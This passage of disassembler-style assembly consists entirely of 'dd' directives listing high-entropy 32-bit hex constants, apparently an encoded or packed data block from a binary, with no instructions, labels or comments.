		dd 27E025E1h, 588D9DA7h, 14BA8FE7h, 7E3FB9DEh, 177DF668h
		dd 9662D972h, 0EB733E61h, 0F3ED9FDFh, 0AED01D25h, 0BDF36999h
		dd 9D7D0B4Dh, 0E078E30Ah, 84C986A4h, 0BA77F76Dh, 0C85D7B61h
		dd 0C364E67Ch, 50694D98h, 5CDFC52Dh, 0C51098D0h, 812B7935h
		dd 66F8AB5Fh, 61E155CAh, 0A743E195h, 842DBD32h,	0ED15099Ch
		dd 8A5600C5h, 527E6F36h, 4DB5AC92h, 0F14CABF6h,	75CA338Eh
		dd 2364DC96h, 0AACBCF5Ah, 1D7D51E8h, 833CD95Ah,	0EE0FBB6Ch
		dd 80CCBD25h, 15766F78h, 0A551D4BCh, 755A2F9Bh,	5267A171h
		dd 48F89956h, 875A3297h, 0F831CFF9h, 768AE5F3h,	0C02833C6h
		dd 75B6C689h, 0BFDB7E9h, 0D0AA370Fh, 84A80B65h,	0B5E9B6A4h
		dd 0CDF4EF3Ah, 0C22B56BDh, 78D41D8Fh, 7AFEA405h, 0DD1981B2h
		dd 17B2E9B6h, 1C732AFFh, 0F226AA99h, 27B82FF6h,	0FE7F45E0h
		dd 16C7B055h, 0AB1C51D0h, 2A1BD412h, 3B50C5FFh,	8C35C0AFh
		dd 6B441307h, 0F6DB7CF6h, 9AE85BBFh, 98C82D70h,	0DD647DBAh
		dd 6F172978h, 0FA439ECh, 0C1C04974h, 0CC2F5FC1h, 1736197Ch
		dd 24CD7494h, 0B750BF2Ah, 0AD1C0916h, 22EEEECFh, 5A083BF5h
		dd 0F4209B82h, 57BBDE66h, 256EF596h, 8BA2ECB9h,	2255D4FAh
		dd 1E343E83h, 72C6B278h, 89CFF35Ah, 0D516AB0Eh,	37CE4C2h
		dd 0EBE29A19h, 0E9DBB18Ch, 50159B9Fh, 0D787B998h, 0F4F097EAh
		dd 10CA873Bh, 0D18070E5h, 0F7B85F52h, 7CD4EB2Bh, 0CA2D8AB8h
		dd 0F11B1728h, 7CC4385Eh, 2FF6F1D5h, 787342E8h,	1FD066A3h
		dd 530233A6h, 5D174CC5h, 93DA96Dh, 0D2E1339Bh, 3E357EF8h
		dd 2DE1B2F4h, 6FEBB149h, 31847136h, 4C8B9015h, 0DB5A3840h
		dd 0DBE4248Bh, 5B3F6238h, 6A89D389h, 6F23297Fh,	3C25A75h
		dd 2FA3B42Bh, 0DC7DA418h, 40C02FCAh, 8F584CC0h,	9579BC7Fh
		dd 8CDFC5C4h, 0DCB29DA4h, 0AAC3138Dh, 0E8E33FB0h, 69A4F1DDh
		dd 0F2EF4437h, 0AD25C37Eh, 65B06EF4h, 0FC628BD5h, 14C4C6AEh
		dd 783CDDD5h, 77EF8B4Dh, 0E8887856h, 0FC2D664h,	0C931DE2Ch
		dd 118E1D64h, 0CFED2447h, 94A97A38h, 3D1C7623h,	5A8665Fh
		dd 81F17C8Fh, 33E54AC3h, 71E7D7A4h, 7D16AF2Bh, 8ABAC5D5h
		dd 517B8275h, 0EAE5A10Bh, 0DEE86FBh, 42DDC69Bh,	97F804BDh
		dd 598A4BF7h, 0C796E823h, 4E5D0B40h, 55F11BAFh,	16833F43h
		dd 6B55E0DAh, 1970A32Bh, 0BFB55A84h, 0D53AD41h,	771F38ECh
		dd 99F35730h, 0CE48BE2Dh, 0BD25E124h, 19E74BF9h, 47062C74h
		dd 89DBC6h, 0D2A75D2h, 50835FFEh, 4CB411F1h, 0FA8C1CE9h
		dd 42FE3AE5h, 8D9A1A2Dh, 0F7A065DBh, 0D567565Ah, 80124AD5h
		dd 7884C306h, 3653337Bh, 668CC176h, 0F8A16372h,	5ACD9FAAh
		dd 52C7505Fh, 96C963Fh,	0B326FB8Fh, 673C8EFCh, 9B4E9465h
		dd 0F033D1E0h, 0A19F4E05h, 0FBC4A62Ch, 84E04C56h, 1DD9A98Ch
		dd 33CF8B89h, 99C99BDAh, 0BF9DB218h, 0E931121Eh, 0C3F5CCEAh
		dd 4C0FDD85h, 0F9974675h, 33D92F4Fh, 10425092h,	0E622C3B1h
		dd 5B259C93h, 0D1F049DEh, 0D300272Dh, 4ABA875Ch, 68EDFDADh
		dd 5FBB76C9h, 0B4C8F941h, 706F0ECEh, 0EC5744EDh, 512F917Fh
		dd 0BD206B08h, 518AB10Fh, 0C6245C45h, 8F7F3E9Bh, 66269BF3h
		dd 0E58B4D4h, 0D2FBA529h, 0D93BF66Ch, 2BAF760Ah, 0B78731A9h
		dd 4FA2E260h, 0D31AD2EBh, 603DA4B9h, 9A5C28C2h,	1E9A94ABh
		dd 0DE6DEDEh, 0B38034DFh, 5FD07E5h, 154EE936h, 2B105CAEh
		dd 68FE7FF7h, 40C25012h
		dd 5D1E2ED1h, 573B7270h, 0BE9F4626h, 839D5A93h,	6AC0AC0Fh
		dd 0C411C3C7h, 0C2C1B7A9h, 78FB4817h, 0D7588A66h, 85E25B26h
		dd 0EA3ACB34h, 10E4FA4h, 0B2A49D91h, 0EA476F73h, 69DA606Fh
		dd 550007CEh, 4C678FD9h, 0BF154BAFh, 8BEBB73Ah,	0B0893220h
		dd 0FF5662C9h, 81C75A2Ah, 3A8B3A5Ah, 0C49987E0h, 0DA2F3208h
		dd 77195A9h, 52E233ABh,	0F1175DE9h, 11E378B9h, 707CD626h
		dd 977346D5h, 0A1CC2B0Dh, 75562D68h, 0D40AFDF2h, 0D468C311h
		dd 30DE2287h, 22D99376h, 3FA61B45h, 5799CA85h, 34E5E8Ch
		dd 6F396846h, 97E05FE0h, 0EAA69B94h, 2D5914A5h,	3F0EEBE8h
		dd 0EA1BDEECh, 98D14748h, 78188F3h, 0ABA6FD3Fh,	0AFB01D95h
		dd 0C98B0486h, 0CD9799DCh, 0C2E944DAh, 2CB3AC44h, 49F414D5h
		dd 0FDE47E25h, 0FF3559EDh, 6AA016A3h, 58A4DF20h, 35171818h
		dd 65F93E8Ch, 0B29D7CBCh, 4AB2D321h, 0A6DA4D01h, 0B86F5F4Fh
		dd 5762F8DEh, 511C8561h, 0B360AD42h, 2B1B7ADBh,	2DEB2F0Dh
		dd 5EDF5577h, 3F174FB6h, 0C88A5177h, 91741F45h,	158F9492h
		dd 0D27CE62Ch, 0EBEE90DCh, 4BEDC984h, 507572E8h, 258CB357h
		dd 8C4FEE47h, 56338679h, 0B3D3656Ch, 1D417D96h,	885FC0B5h
		dd 0AC9A2575h, 74CD0E76h, 25C9D2EFh, 0B4745E1Dh, 0E2E3A0F9h
		dd 3D71D48Fh, 25622CD8h, 0CCF0B639h, 4DEA26A6h,	855B3D8Bh
		dd 0C19274A1h, 42D1CBF0h, 7AA4976Ch, 64F729A7h,	55C8AA63h
		dd 6FBFB340h, 9D2ADAF0h, 0ACBC1D87h, 4A9969D7h,	93B49233h
		dd 0EA215AB2h, 0E4B374F9h, 79A5091Ch, 50A56E40h, 8E3495E7h
		dd 41F9EE18h, 0FB720C72h, 923DF1CDh, 0F0FE4CC3h, 2E6C457Eh
		dd 322D8AEEh, 0F62F63h,	0B22DDADFh, 3D5A5D78h, 99FE6ED3h
		dd 0D1DE4607h, 0D53581A1h, 0AED21705h, 0B934D216h, 7A0C1DFAh
		dd 0FAA28C66h, 87E73B4h, 939731Fh, 0C6E92A8Ch, 0ADF26C3Ah
		dd 88FE0CD2h, 33B9BB34h, 0AE33CBCAh, 0EFD577E9h, 8F1DD657h
		dd 2AF711C8h, 0DA436485h, 54FE0398h, 3D9FF0AEh,	0D58FC7Ch
		dd 16FC2332h, 0AC5534EAh, 59F43845h, 5AC02B41h,	0DDFE1311h
		dd 0BFCAF2B0h, 0AA47D440h, 0BA7CFBF7h, 0E3254BFAh, 0F593BF13h
		dd 0DE524A28h, 2FC6BCEAh, 82D4710Fh, 74B68A94h,	3F45585h
		dd 85F56657h, 0C54D74ACh, 69063E8Ch, 0C9FB5960h, 8151B303h
		dd 0E3AE6278h, 0BF9BC1A2h, 6210BA06h, 0E46037B2h, 0DAF98CBAh
		dd 9FB47F65h, 2CB7E6F5h, 94D0C75Ah, 0F53A8714h,	0B6972EB0h
		dd 1C999F22h, 0D5920A38h, 36AF5AC6h, 0B718D0C3h, 2BE6A81Bh
		dd 66FB9C1Bh, 3D9D770Ch, 0CB476A39h, 0B96363F0h, 91F86F5Dh
		dd 0E6D2A036h, 75438323h, 4C5D9C86h, 895946DCh,	9469DBE3h
		dd 0FA51FCFh, 9DB9EDABh, 0D9559152h, 0B053EB41h, 6D341B76h
		dd 68B01A4Bh, 56A58EAFh, 2B8BD2BBh, 0CBF34CB4h,	0ACF9B858h
		dd 7ED9EA18h, 8E06F2FCh, 45C6FC24h, 1159FA13h, 331142E6h
		dd 5F4B1F36h, 5B19A28Dh, 0FA8DFC79h, 7F485779h,	0A09B4984h
		dd 46D0ABB5h, 9EDFB96Dh, 31F64A4h, 0A12D5909h, 0ACDC3A3Bh
		dd 0F67663E1h, 6A79A345h, 0A43C7CDFh, 4DA34A2Bh, 82ABE35Eh
		dd 4CD9D73Fh, 716412A6h, 29982330h, 9071D59h, 75ECC20Ch
		dd 0F50EC3E9h, 9375F418h, 0BD96556Dh, 4E766599h, 56D4F62Ch
		dd 0AB6B5D96h, 9FA2F570h, 14CAF5E9h, 5A38C2FCh,	0A3E3E657h
		dd 0AFBF929Fh, 3D9A5F7Fh, 0ED2DDE0Fh, 0D6644A8h, 316C1AEAh
		dd 0BC8528D6h, 4DEEE272h, 5FC1F919h, 0D3768E44h, 462ADCD4h
		dd 0CB7BD0FCh, 3678F0C7h, 0CAC0AB73h, 1C4B925Dh, 43B9FDEAh
		dd 219C6565h, 91A12ED3h, 0B96CA7F2h, 0A3735F16h, 69092E05h
		dd 15911DCCh, 96FEB8BBh, 3F8969EDh, 0DDFCE3F0h,	9F70CF66h
		dd 4A9B6F22h, 4E2F7CF1h, 0AEB821A4h, 481333E4h,	79F8C792h
		dd 953B2364h, 67F7A533h, 34244567h, 59D19D2Ah, 0BF49A0BFh
		dd 0D16A8AA1h, 6A1C6666h, 68697122h, 9F19A5D9h,	0FC8B5F1Bh
		dd 1A47507h, 0AB7287B6h, 9A04B256h, 0C3C02991h,	97CD6F99h
		dd 0B81FF6D4h, 158E553Ch, 0E16F95DFh, 1E8AA117h, 9B3B6234h
		dd 6588BC61h, 0B514C526h, 0E9AC7A78h, 317B66E3h, 1C15942Ch
		dd 0A786046Ah, 5BEE9502h, 8C165751h, 58251739h,	68DB32E9h
		dd 0F175D2C7h, 6C0FD6F1h, 0BCBD524Ah, 375C0E61h, 9DE6DF83h
		dd 4B0A4CAh, 242C9F52h,	0DDDD535Ch, 584AF510h, 0CB7D91D0h
		dd 0D4BBD767h, 73BEB452h, 0CEBA9097h, 6BDE279Ch, 0B12C37CDh
		dd 7E93BE58h, 310ADED6h, 0F2BDD0C3h, 0F45D60C2h, 8BDB56DAh
		dd 4436E5DEh, 4377BD9Eh, 0BB0F9558h, 97A8F552h,	64CFC1C1h
		dd 2AB092D1h, 826989Ah,	0BC65DEDEh, 7EE0237Bh, 0A0D42CADh
		dd 0C5275854h, 33A075CAh, 0E0AE6FFDh, 0F074CE7Ah, 0FD3B947Dh
		dd 8E5B654Fh, 0FB5DC4B9h, 0F1D82EB2h, 53CFA9E1h, 0C253A841h
		dd 0E053BF70h, 6ECC5EBAh, 93B87A29h, 77D7AA3Bh,	0BD43B4EDh
		dd 0CEDAC0CAh, 1EF8F0D9h, 0AA9A0D28h, 7C512B5h,	1B3A3FEEh
		dd 11B951C7h, 0EB7CFC17h, 0AA4F46F9h, 25295570h, 306BB29Dh
		dd 990FBF34h, 2B28ED4Dh, 5AAED3FBh, 0C2C3165Eh,	0DEAA60F7h
		dd 474BDDDAh, 0BEAD59CBh, 5CEBC1D7h, 68ED8150h,	0AA163659h
		dd 39BFCBDFh, 0EC8E8F1Dh, 0DAFBB8E3h, 0C3479889h, 957A7301h
		dd 560D2BDEh, 0C3B4F902h, 75D5BA73h, 0EE0E8EA0h, 0D95D7E5Bh
		dd 8B8798FEh, 1DD489ECh, 0B52B2A7Bh, 1F78C0F8h,	0B75744FEh
		dd 93EAD0Bh, 0FDA5586Bh, 0EC3BDCA8h, 8B235380h,	0DA3E291Fh
		dd 0CEF5630Ch, 0C25BDCFBh, 0AD73D591h, 5D6B5DE8h, 7D139AC3h
		dd 6A8D470Dh, 1DFB54D4h, 51C1C33Bh, 0A6C8A3D0h,	9C85C575h
		dd 0B15E7DECh, 0A9864F0Ah, 9CABB86Ah, 7F36642Ah, 0F8C0A274h
		dd 0D175548Bh, 3B9F0167h, 0AB59BA3Ah, 252664FDh, 0D2D632BDh
		dd 0F55E56EEh, 8DF1C2EFh, 0DD71D11Fh, 5DEEF4ABh, 0D1663AC9h
		dd 0C615CE35h, 0D14C2189h, 361EA5D6h, 0D7B60E63h, 37CA502Fh
		dd 110A675Fh, 58A748F5h, 6C6D9FD3h, 1E165551h, 0F7FAEFB7h
		dd 49E2B606h, 0AE53F6CFh, 0A89CCC4Dh, 4D7A374Ch, 0ED6E5FB7h
		dd 9EBBF415h, 3139EEDEh, 2454C774h, 58357FA1h, 289FEF94h
		dd 65F9BEDBh, 7CB5D407h, 0BA403569h, 8920F5Ch, 0E9EC0597h
		dd 9D79AE7Dh, 5AEA8DFFh, 0D17564AEh, 0B84E954Eh, 8A929877h
		dd 85FD9679h, 0A7E7D279h, 1939770Eh, 0E05FC806h, 0B5AACF2Bh
		dd 148DC7FCh, 458A6409h, 7C3D2F4Ah, 6317D9BFh, 0E03E9B1Ch
		dd 4271EA87h, 92EABD25h, 55CE1556h, 34DFADA1h, 0CE39D31h
		dd 2EFCA3EAh, 645913E9h, 9ED9D6B1h, 0E7D1127h, 505D360Dh
		dd 0F6D16767h, 0C2FC3F93h, 84B449C8h, 9B12C09Ah, 0B99C566Ch
		dd 0A6276917h, 9B33A32Fh, 0BF763577h, 0BF7395BDh, 3D68B48Bh
		dd 0F53916FAh, 2DD79BF2h, 925A9AC4h, 3E0F0356h,	0B0AF3F9Ah
		dd 5F700206h, 0DA8E520Eh, 0F0F1F46Ch, 129181F4h, 0FBFFA9BCh
		dd 0A6AF3024h, 0D5F23A7Fh, 0FAF68ABh, 788B749Ch, 5689BDDDh
		dd 45456F82h, 164894F1h, 66112710h, 13518D3Eh, 7E574E54h
		dd 57E1FF3Bh, 4FDD1F36h, 7F45F6D0h, 67E86B1Ah, 0EAD53709h
		dd 0CB25EFCBh, 0EEC6B46h, 728AC28Eh, 54ACF6F1h,	0D97E97E7h
		dd 0EB8213EDh, 6A5B3677h, 76395C1Bh, 17E49ED8h,	3803CA8Ch
		dd 0C6A3D4A9h, 0D5A2F16h, 614A0F74h, 50A472E0h,	2689266Bh
		dd 0BC43E998h, 7495D496h, 0E228E56Eh, 80C7D4E1h, 27C87DB3h
		dd 0BE91D54h, 7CCEBD90h, 57D392E6h, 3FACEF8Fh, 37850989h
		dd 0E0F811FCh, 3DB0BFB4h
		dd 0AB2E23E5h, 5362D09Ch, 0A6E79F72h, 0DF7203E1h, 7650D07Dh
		dd 38B6EEC9h, 3622E54Eh, 11228CCh, 0E879CBC0h, 9381532Bh
		dd 0A158251Ah, 3801F7C9h, 9BD49F5Bh, 1BB0BE46h,	0A7BCC6B5h
		dd 17BDC8FEh, 99F931DCh, 0FB54C11Ah, 0A3E1F8h, 3C03FD5Fh
		dd 0C74505BCh, 0BAE518D8h, 1D17B9A3h, 4B501764h, 2BEC1DCh
		dd 38FED422h, 0F83C9A3h, 0DBCDD9ECh, 31D69BDCh,	0F1549933h
		dd 51C5BE54h, 0BF5BCB62h, 0D16179CBh, 9503069Ah, 0EAD10286h
		dd 796EDD34h, 0B15E65BDh, 0AFF00B97h, 889390D4h, 0F66BB7D6h
		dd 0ED5D8136h, 9DAE2462h, 9C1E69C8h, 7F7E7CCh, 0D3D9EF0Eh
		dd 0C65D18CBh, 281FB0FFh, 2D1D01B8h, 0BD9B568Ah, 0E1C4A6D1h
		dd 4B997BECh, 303FEACh,	4E312509h, 0C091F2D5h, 0B8313146h
		dd 14F9F081h, 0D615056Ch, 0A0BFF636h, 215A5D0Fh, 0DEF54A8Bh
		dd 924F88B3h, 0C73B9656h, 0B8394296h, 15D12925h, 8B8510B6h
		dd 0D3C3D9A3h, 8502FD59h, 30F2F073h, 0C6A8B064h, 1EAD713h
		dd 2B7F2E8Fh, 8BCD9158h, 0B0E972E6h, 15DE7F77h,	82BBF17Eh
		dd 52AE275Bh, 90EAF33Eh, 7D177237h, 9B52851Bh, 45F996C6h
		dd 0E9C1DC42h, 21F84A04h, 0F413F3C1h, 33D17A37h, 0D9671F03h
		dd 543A4AB5h, 0C0DA05FAh, 55E8D6D9h, 0B6FB97F1h, 0C5744D29h
		dd 55D725Bh, 7CBA0C92h,	661FC0FBh, 955B599Eh, 0A7FC84E0h
		dd 9D735A3Bh, 0CD69FD5Ch, 0A16150F1h, 0DDFA3D80h, 8CF7D03Bh
		dd 6EA1839h, 0B79F2A6Bh, 0BA1285C1h, 0B42CB464h, 7E2F05F1h
		dd 66BEB5C8h, 0B46F8B7Eh, 1F51C4F1h, 9CDB79EDh,	5700EB17h
		dd 1FD3DB64h, 57E4C67Ch, 2E6C9D7Ah, 3A9CA94Dh, 60022AE8h
		dd 0EB2FCCADh, 1E12E95Eh, 1559A893h, 3DFFB55Fh,	1CE872DCh
		dd 312EDD6Bh, 0DCF4AA4Dh, 73469495h, 25DF8A9Fh,	9CA8AF28h
		dd 2DECB61Dh, 0C114E34Bh, 8DD28D9Ch, 0D42BC93Bh, 0BD035A33h
		dd 9CC97539h, 789819E5h, 0A7E1F83Ch, 0C82C324Eh, 0F015276Ah
		dd 990C8A56h, 67428AFDh, 0D9E62073h, 9328BD3Ch,	0F06C724Eh
		dd 0B85342F0h, 0AE2BA4FEh, 2B533826h, 0B207E5Dh, 65D13E78h
		dd 0E554DA68h, 71B1DEF0h, 0BB915E53h, 0C7416B11h, 3B3791D8h
		dd 530FD1B7h, 254A5EA7h, 4ADCC650h, 0D71E0585h,	7CFEED44h
		dd 1A85166Fh, 616C9295h, 0D8D12FCEh, 669ADBCBh,	0C97D3810h
		dd 0A5A54CACh, 0BEC3BF3Ah, 5D7439C7h, 0A3522D4Ah, 0DF0350BBh
		dd 9B98DA6Ah, 0B8E548B6h, 0D4640462h, 6ABF3964h, 0E8FAF03Fh
		dd 7D287273h, 797A71E5h, 8D652661h, 0D6DA4A6Dh,	751BA3B3h
		dd 33E0D29Dh, 22A95CDFh, 0D09993FAh, 57CB84E3h,	822EA26Eh
		dd 348283EBh, 0AF2BEDD0h, 0E65E0BB0h, 1D0107A9h, 0E87FC48Fh
		dd 68A36AE0h, 94B771Dh,	62786156h, 1D2EE8FFh, 2FF14EF2h
		dd 0DB7BA0DCh, 0BB7AD8DEh, 73B11A04h, 491CCCE3h, 638D81Eh
		dd 0B5869F80h, 478836EFh, 0EA50E2BAh, 22BF4F32h, 8B7CC906h
		dd 7AF8A34Ah, 0EAD61715h, 9C0D8DC1h, 0E3DD89D9h, 569D78C5h
		dd 0F962EBD7h, 0F89B40F8h, 915D383Ch, 7E28AF7Dh, 6E091BAEh
		dd 336A1625h, 196C6349h, 6B268AAFh, 945E4507h, 5169BF6Ah
		dd 6CC4CC3Bh, 6CB00667h, 44CD5E7Eh, 4F2AB1ABh, 0D9107E41h
		dd 6258BAC3h, 58C4A539h, 52170546h, 7DAAFDF8h, 0C7781A69h
		dd 0F5E93A25h, 0E781266Fh, 411AA2F4h, 0C8514DC5h, 0F04CB2BEh
		dd 860FCEF5h, 0EA99AA66h, 5CBAB058h, 8AEB429Fh,	9C1DE51Ah
		dd 6F733713h, 1B28E217h, 4CEAE981h, 556E2363h, 349B9DC2h
		dd 618AC8Ah, 6F833AABh,	78111136h, 187EE1FAh, 5C93A896h
		dd 366279Ah, 0D69D3F8Ah, 0D2F72BEFh, 0A9E4A817h, 21A65CA0h
		dd 3009DDA6h, 9448930Dh, 18214EB4h, 0DB5ABFD2h,	8607C3F2h
		dd 93EF18B8h, 7EB3B32Bh, 0AA0D7B1Fh, 0A88D80F4h, 0D65E26A2h
		dd 0E0EF9D4h, 0BF32432Fh, 9C7F7909h, 8F86EB32h,	0E57D391Eh
		dd 10FCB6C4h, 0EAC97634h, 1F575173h, 8D601B2Ah,	7894EF02h
		dd 50455F60h, 0F0AB3819h, 925EC54Eh, 0BF1EF81Ah, 0D449642Ch
		dd 0E430D140h, 83013DCFh, 3C966AB7h, 0D1BF1A8Ah, 0D020631h
		dd 44B33B3Bh, 0F351D582h, 1E34A4CAh, 5D262998h,	0AE4686C1h
		dd 928BD32Ch, 0F6EA69F9h, 0F5C61FECh, 339D8151h, 62B24A5Ah
		dd 4290FF96h, 635ABDE5h, 68B163A1h, 189F0F0Ah, 772641C3h
		dd 9880B106h, 7D19A8D2h, 7FE71657h, 38EBF376h, 0D6EFAD44h
		dd 0B3AE757Eh, 0EE07A48Ch, 2A714854h, 4BB91DB3h, 0EA0C2902h
		dd 106B507Fh, 7B44DDB4h, 0BFA5FE95h, 51375300h,	0D112337Fh
		dd 23CC6C80h, 8A05A8C7h, 3230ED0Ch, 0B45095Bh, 1F73735Fh
		dd 65293273h, 4577ED4Fh, 94FEF28Bh, 0BCEA97EEh,	611498F6h
		dd 0D0FFA5ECh, 0A46351DAh, 4618CA5Dh, 981F84E3h, 0C077E8B3h
		dd 0CE7F7D8Eh, 0AE178E5Fh, 0F0C0774Dh, 0A2913375h, 0DD0D88AFh
		dd 49BED8CBh, 595AD6DDh, 12899198h, 0A10FEA3Ch,	0DE87C6D7h
		dd 2063C14Eh, 0F3DE1B59h, 7A1D80FBh, 76BA3A31h,	2B9A1532h
		dd 0BBE7674Dh, 0F4DBA1Bh, 95151F7Bh, 0F05E4DCFh, 0BFF1ADA8h
		dd 0E3D5BEDEh, 0AC1822Fh, 1557525Ch, 977CD8F3h,	0BCCF51C3h
		dd 62EA9C16h, 5756C3D6h, 342027C6h, 991DB27Ch, 961B4DA1h
		dd 0FF2D017Fh, 0E1A7C7C0h, 0B3145945h, 65217D18h, 3FADD570h
		dd 6B03178Ch, 0F03D5DB4h, 0C54B3A5Fh, 91D6B9FAh, 237D91AAh
		dd 0C781275Bh, 3E461789h, 0DEF511D6h, 0B912178Fh, 7DE5E229h
		dd 5A18F03Bh, 25F3D2A9h, 147EAB30h, 55B2F48Fh, 710CDBCDh
		dd 1E8A0299h, 0B4338A04h, 767A9D74h, 0D6F9A658h, 745A2BBAh
		dd 574C178Ah, 9E141F49h, 94755827h, 0AFE545F7h,	3E939432h
		dd 0F7D9DD76h, 0B301EF3Eh, 0DF8B5D95h, 9C0A60EEh, 0A176F0F7h
		dd 3F1E8AF2h, 0FF2325A7h, 0DF775B81h, 920ACEA5h, 0F3D918C9h
		dd 9CFB52E9h, 7F259DA2h, 0D2CB6166h, 916BFA65h,	1F2FC95Fh
		dd 0C78BBA22h, 0ADDDECA7h, 0F73B7883h, 0AD1F8DD6h, 0C7A48DFBh
		dd 0FFA4B2EBh, 0EE7E0619h, 2F8FBCAAh, 7C376A5Ah, 456ADBABh
		dd 5C8A11DDh, 5A2D40A2h, 3C3DD12Bh, 8D6D561Ah, 0CA51631Ah
		dd 5801D7C5h, 761249C7h, 883F5036h, 94947696h, 0B2FFC5AEh
		dd 0AEFECC0h, 7C972E13h, 97B6DF8Ch, 3F1B6289h, 34EE818Ch
		dd 93F6B0A3h, 6A8BD83Ah, 0D407256Ch, 0B651B718h, 0CBD54459h
		dd 0FE9FAEA2h, 2AD27A2Ch, 9ED19A7Ah, 0F1DD3CBDh, 7DBEF090h
		dd 0BC34A51Ah, 5ED1C0FBh, 0E895BE87h, 2C117ADEh, 9DA4594Dh
		dd 2AF9C6Ch, 0F238E387h, 0E610598Bh, 0F388993Ch, 0BD741236h
		dd 0E5D86B83h, 19B7BE3Bh, 66E8D89Ah, 13465989h,	9E44EACBh
		dd 8E6032C1h, 6E922538h, 4FE17A25h, 557F08FCh, 13902326h
		dd 0BAA10C02h, 0D8A377A1h, 0C40D68F2h, 8DB3553Ah, 0C25E8DA1h
		dd 0C92D5759h, 94C2D449h, 153B01F3h, 0C15EB0FCh, 0B92ADCD7h
		dd 1ABD5768h, 0FB9077BEh, 69D69267h, 13B3F6D1h,	5A37F1ACh
		dd 0CAA62568h, 0C398B688h, 858D6931h, 0E2194ECAh, 0C6B168CCh
		dd 0EF3A2568h, 2FF08B90h, 9ADF5344h, 820354Eh, 9EAB383Ch
		dd 76D1B85Ah, 0BD14D0AFh, 0C81B87FBh, 0E662D51Ah, 176A7E1Fh
		dd 0B7319DCFh, 0EDC9DC9h, 18405D8Eh, 0BF304338h, 493D8525h
		dd 0E211249Ah, 0B1A5436Ah, 0D1157B3h, 0B8E43B4Bh, 743F68B4h
		dd 0B7079F5Bh, 694CDCDAh, 0F0EF9115h, 4F65ECCDh, 8B41B348h
		dd 0E3E6F2AAh, 0B68FE7D3h, 0C93C4BBh, 685A4BB1h, 0CAC07B1h
		dd 0FBDE2E7Bh, 0CF936371h, 5C6ADC7Eh, 452BB527h, 0C8765350h
		dd 0DD4EBFADh, 62E5AFF0h
		dd 5AEB3CC4h, 0F4EFF68Ah, 0F1AD13A9h, 5B9DD617h, 0B7EB3F56h
		dd 0FA0FAAFCh, 0B4DE1FE8h, 0BF054125h, 3836063Bh, 5EAB893Ch
		dd 150BFEC9h, 64A9672Dh, 2DCD85C6h, 876F461Fh, 559D1B44h
		dd 0B9D11DCCh, 23A5127Eh, 57DB8171h, 500669BCh,	0C51768Ah
		dd 5A4F195Fh, 7A605795h, 3D17FCF4h, 50AA3F6Bh, 0A5A386C8h
		dd 0DFEAB55Ch, 0ABFD24EEh, 18D5427Bh, 0FC593CEh, 4F39A32Fh
		dd 0DA7A61B8h, 10DD0CEEh, 0A6A16E2Ah, 9D679666h, 0A44D6F5Ah
		dd 0B657C730h, 9B932BACh, 67C27C0Fh, 0F2DB4BD0h, 701CD99Dh
		dd 50F16DFh, 0CAEFC26Ch, 42FC03DEh, 1F0D7B75h, 79A3AD2Ch
		dd 5C577870h, 5AA5F68Eh, 7DC3EFA0h, 0DFA038D8h,	2CA1C9F1h
		dd 0C6A7463Fh, 2B701BDCh, 0AFDF1CA7h, 70208173h, 975F2361h
		dd 876A4F3Eh, 502C032Eh, 0E9497FEBh, 4EAD6DCDh,	0FEC521A5h
		dd 870675ADh, 92B5DAD5h, 16FBC268h, 0CC712B06h,	295500DFh
		dd 65FD7795h, 570CB2Dh,	5E85983Eh, 0C5F391DAh, 754E6A2Eh
		dd 39AF128Dh, 7E3C6063h, 686EF197h, 355501Eh, 0C719C855h
		dd 22E98F6Ah, 0EB5702EBh, 38F1D82Dh, 0EE0F7B17h, 99902951h
		dd 0FAFC665Dh, 979AC417h, 0FCC5AAECh, 0F1BC2A32h, 1BA01F0Ah
		dd 3395FC07h, 90A2663Ah, 1E9C855Eh, 0C9C1472Ah,	6CF51646h
		dd 0EA04B33Ah, 0E06A52FAh, 0AAE21CAEh, 996C968Dh, 905554D1h
		dd 0A8183F1Bh, 0BB03D2A3h, 0D4AEFC5Fh, 0FA59D69Eh, 0A1F84587h
		dd 0F2EF0F3Fh, 0D0B53B29h, 4D8C9FDAh, 7A89F93Ch, 7AD6717Ah
		dd 0AD54857h, 0E94AF4Fh, 0F809A543h, 0C433D3E1h, 0A05C82B1h
		dd 7A94D855h, 831B1953h, 5FC47D5Fh, 0FA228F23h,	0E7319318h
		dd 207CCFF0h, 0B8FEDE7Ah, 2BC3ADBh, 0FEDC5D9Bh,	0ED0D93A2h
		dd 8D05ABCFh, 0A2A8C6F1h, 83F998D9h, 54AF015Fh,	1FC6C2B5h
		dd 18B3E38h, 0BE92B0A8h, 149C6136h, 0EA475ED1h,	9484AB6h
		dd 0ED7E018Ch, 0FF69EDBBh, 0FC176BCEh, 0F8F74D0h, 0AAB64E0Ch
		dd 54724DA8h, 48452617h, 6C6ECCC8h, 15D29E01h, 0EDAF07F5h
		dd 0F0EC11Eh, 0B9106FBBh, 7EF7048h, 0F42D6AEEh,	3C7C7DA9h
		dd 743DFC1Eh, 6B7E093Eh, 0C9A24F9h, 25FF7EB7h, 2F3BB855h
		dd 0B14E5BC1h, 0B5C1E568h, 0AB2EC0B5h, 0A8DA70EAh, 0BF53492Eh
		dd 274236D9h, 7672FF5Fh, 12552F46h, 0DCA44888h,	0ECC1F930h
		dd 0D7C13F13h, 0D0A1B1BCh, 86856AB9h, 0CE74F8EAh, 0CFDA5CDFh
		dd 0AF5C0EC6h, 75407CF3h, 0FC20241Fh, 3EF09E39h, 21E744CAh
		dd 9AC0FC35h, 5B7F14C4h, 67DFF9ECh, 2A9E763Eh, 799712C8h
		dd 6890FCEFh, 72C74B15h, 71CA65F8h, 3E1C8CE3h, 670071C9h
		dd 0ED2B4E06h, 6F2ABF93h, 0B8BCA771h, 0DEDA78C9h, 0FB952FB3h
		dd 0EB244B44h, 0C2738677h, 0A70F62FCh, 0D8DC2A0h, 0A385A974h
		dd 0B08AF45Fh, 17EF4351h, 8D32551Eh, 30893D79h,	33B6C7F2h
		dd 71A73EA3h, 0AF7B1DF4h, 79137705h, 8F0FD795h,	1A2133F7h
		dd 0CBFADC3Dh, 7A8F0D62h, 829231B1h, 56B49CBFh,	0EFF2C7F9h
		dd 0AD2686Ch, 9EF75A94h, 0A036F766h, 8F36EDF5h,	0AC9AB33Eh
		dd 0DBD306B3h, 0DC62D6F1h, 81FD1F6Ch, 23F74151h, 0EE365910h
		dd 0D18D7A4Dh, 0BE94F939h, 0AF6ADBE0h, 503E5969h, 252AE6C8h
		dd 9CFEF555h, 0F5291429h, 7FA87169h, 0D5528E82h, 1848F572h
